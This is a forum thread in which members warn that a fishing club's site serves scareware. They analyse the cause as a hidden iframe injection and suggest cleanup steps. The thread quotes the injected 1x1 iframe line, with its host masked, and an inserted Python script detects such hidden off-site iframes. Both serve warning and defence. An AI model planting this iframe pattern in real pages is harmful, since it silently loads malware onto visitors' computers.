NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

Discussion in 'Fly Fishing Forum' started by DennisE, Jul 16, 2012.

  1. DennisE

    DennisE Topwater and tying.

    I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to eradicate this "Scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today) so they are still infected.
    I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
  2. Flyborg

    Flyborg Active Member

    It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

    <iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
    (I blocked out the actual URL)

    Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
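
A check for the pattern described in the post above, added here as an example and not part of the original thread: it flags iframes that are both hidden (tiny dimensions or styled invisible) and loaded from a host other than the site's own. The host names, the sample page and the 2px threshold are assumptions made up for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

TINY = 2  # assumption: an iframe of 2px or less on either axis counts as hidden

def _px(value):
    """Return a pixel dimension as int, or None if absent or not plain pixels."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return int(m.group(1)) if m else None

class IframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, foreign host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.site_host
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ((w is not None and w <= TINY) or (h is not None and h <= TINY)
                  or "display:none" in style or "visibility:hidden" in style)
        if external and hidden:
            line, _ = self.getpos()
            self.findings.append((line, host, a.get("src")))

def scan_html(text, site_host):
    """Return hidden, off-site iframes found in one page's HTML."""
    finder = IframeFinder(site_host)
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample page: injected first line, a same-site frame, a visible embed.
SAMPLE = """<iframe src="http://injected.example.invalid/in.cgi?1" width="1" height="1" frameborder="0"></iframe>
<html><body>
<iframe src="http://www.club.example/map.html" width="1" height="1"></iframe>
<iframe src="https://video.example.org/embed/42" width="560" height="315"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for line, host, src in scan_html(SAMPLE, "www.club.example"):
        print(f"line {line}: hidden iframe to {host}: {src}")
```

Running it over every file in the web root, and over the HTML the server actually returns, separates a static edit from markup that is generated dynamically.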
  3. Davy

    Davy Active Member

    that's not fun
  4. Flyborg

    Flyborg Active Member

    Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially WordPress!).
  5. I do not know enough about this tech stuff. Yet if they have a bug why would you not just call them and tell them?
  6. Whitey

    Whitey Active Member

    note to self: when computer breaks, call flyborg.
  7. Pete Bridge

    Pete Bridge Member

    Every time flyborg posts on a thread, I find myself clicking his avatar and laughing my ass off... Can't get over it.
  8. Westfork

    Westfork Member

    Changing the FTP credentials might not help much. IFRAME malware most likely occurs from SQL injection... sloppy coding, in other words.

    If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

    Sanitize those Database queries or people talk about you on forums like this.